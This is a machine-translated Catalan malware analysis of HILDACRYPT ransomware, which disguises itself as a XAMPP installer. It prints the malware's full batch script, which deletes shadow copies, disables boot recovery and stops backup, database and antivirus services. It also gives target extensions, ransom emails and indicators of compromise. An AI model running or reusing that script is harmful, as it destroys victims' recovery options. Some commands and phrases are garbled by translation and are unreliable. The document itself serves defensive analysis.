Hola, Habr! Un cop més, estem parlant de les últimes versions de programari maliciós de la categoria Ransomware. HILDACRYPT és un nou ransomware, un membre de la família Hilda descobert l'agost de 2019, que porta el nom del dibuix animat de Netflix que es va utilitzar per distribuir el programari. Avui ens familiaritzem amb les característiques tècniques d'aquest virus de ransomware actualitzat.
A la primera versió del ransomware Hilda, un enllaç a un publicat a Youtube La sèrie de dibuixos animats estava inclosa a la carta de rescat. HILDACRYPT es fa passar per un instal·lador XAMPP legítim, una distribució Apache fàcil d'instal·lar que inclou MariaDB, PHP i Perl. Al mateix temps, el cryptolocker té un nom de fitxer diferent: xamp. A més, el fitxer de ransomware no té una signatura electrònica.
Anàlisi estàtica
El ransomware està contingut en un fitxer PE32 .NET escrit per a MS WindowsLa seva mida és de 135.168 bytes. Tant el codi principal del programa com el codi del defensor estan escrits en C#. Segons la data i l'hora de compilació, el fitxer binari es va crear el 14 de setembre de 2019.
Segons Detect It Easy, el ransomware s'arxiva amb Confuser i ConfuserEx, però aquests ofuscadors són els mateixos que abans, només ConfuserEx és el successor de Confuser, de manera que les seves signatures de codi són similars.
De fet, HILDACRYPT està empaquetat amb ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vector d'atac
El més probable és que el ransomware es va descobrir en un dels llocs de programació web, fent-se passar per un programa XAMPP legítim.
Es pot veure tota la cadena d'infecció .
Ofuscament
Les cadenes de ransomware s'emmagatzemen en forma xifrada. Quan es llança, HILDACRYPT els desxifra mitjançant Base64 i AES-256-CBC.
Instal · lació
En primer lloc, el ransomware crea una carpeta a %AppDataRoaming% en la qual es genera aleatòriament el paràmetre GUID (Globally Unique Identifier). En afegir un fitxer ratpenat a aquesta ubicació, el virus de ransomware el llança amb cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat i sortiu
A continuació, comença a executar un script per lots per desactivar les funcions o serveis del sistema.
L'script conté una llarga llista d'ordres que destrueixen les còpies d'ombra, desactiven el servidor SQL, les còpies de seguretat i les solucions antivirus.
Per exemple, intenta aturar els serveis d'Acronis Backup sense èxit. A més, ataca sistemes de còpia de seguretat i solucions antivirus dels següents proveïdors: Veeam, Sophos, Kaspersky, McAfee i altres.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Un cop desactivats els serveis i processos esmentats anteriorment, el cryptolocker recopila informació sobre tots els processos en execució mitjançant l'ordre tasklist per assegurar-se que tots els serveis necessaris estan inactivats.
llista de tasques v/fo csv
Aquesta ordre mostra una llista detallada dels processos en execució, els elements dels quals estan separats pel signe ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Després d'aquesta comprovació, el ransomware comença el procés de xifratge.
Xifrat
Xifratge de fitxers
HILDACRYPT revisa tots els continguts trobats dels discs durs, excepte les carpetes Recycle.Bin i Reference AssemblysMicrosoft. Aquest últim conté fitxers crítics dll, pdb, etc. per a aplicacions .Net que poden afectar el funcionament del ransomware. Per cercar fitxers que es xifraran, s'utilitza la següent llista d'extensions:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
El ransomware utilitza l'algoritme AES-256-CBC per xifrar els fitxers d'usuari. La mida de la clau és de 256 bits i la mida del vector d'inicialització (IV) és de 16 bytes.
A la captura de pantalla següent, els valors de byte_2 i byte_1 es van obtenir aleatòriament mitjançant GetBytes().
Clau
EN I
El fitxer xifrat té l'extensió HCY!.. Aquest és un exemple de fitxer xifrat. La clau i l'IV esmentats anteriorment es van crear per a aquest fitxer.
Xifratge de claus
El criptolocker emmagatzema la clau AES generada en un fitxer xifrat. La primera part del fitxer xifrat té una capçalera que conté dades com HILDACRYPT, KEY, IV, FileLen en format XML i té aquest aspecte:
El xifratge de claus AES i IV es fa mitjançant RSA-2048 i la codificació es fa amb Base64. La clau pública RSA s'emmagatzema al cos del cryptolocker en una de les cadenes xifrades en format XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
S'utilitza una clau pública RSA per xifrar la clau del fitxer AES. La clau pública RSA està codificada en Base64 i consta d'un mòdul i un exponent públic de 65537. El desxifrat requereix la clau privada RSA, que té l'atacant.
Després del xifratge RSA, la clau AES es codifica mitjançant Base64 emmagatzemat al fitxer xifrat.
Missatge de rescat
Un cop finalitzat el xifratge, HILDACRYPT escriu el fitxer html a la carpeta on ha xifrat els fitxers. La notificació de ransomware conté dues adreces de correu electrònic on la víctima pot contactar amb l'atacant.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
L'avís d'extorsió també conté la línia "No loli és segur;)", una referència a personatges d'anime i manga amb l'aparença de nenes prohibides al Japó.
Sortida
HILDACRYPT, una nova família de ransomware, ha llançat una nova versió. El model de xifratge evita que la víctima desxifra els fitxers xifrats pel ransomware. Cryptolocker utilitza mètodes de protecció actius per desactivar els serveis de protecció relacionats amb sistemes de còpia de seguretat i solucions antivirus. L'autor de HILDACRYPT és un fan de la sèrie animada Hilda que es mostra a Netflix, l'enllaç al tràiler de la qual es trobava a la carta de compra de la versió anterior del programa.
Com sempre, и pot protegir el vostre ordinador del ransomware HILDACRYPT i els proveïdors tenen la capacitat de protegir els seus clients amb . La protecció està assegurada pel fet que aquestes solucions inclouen inclou no només còpies de seguretat, sinó també el nostre sistema de seguretat integrat - Impulsat per un model d'aprenentatge automàtic i basat en heurístiques del comportament, una tecnologia capaç de contrarestar l'amenaça del ransomware de dia zero com cap altra.
Indicadors de compromís
Extensió de fitxer HCY!
HILDACRYPTReadMe.html
xamp.exe amb una lletra "p" i sense signatura digital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Font: www.habr.com
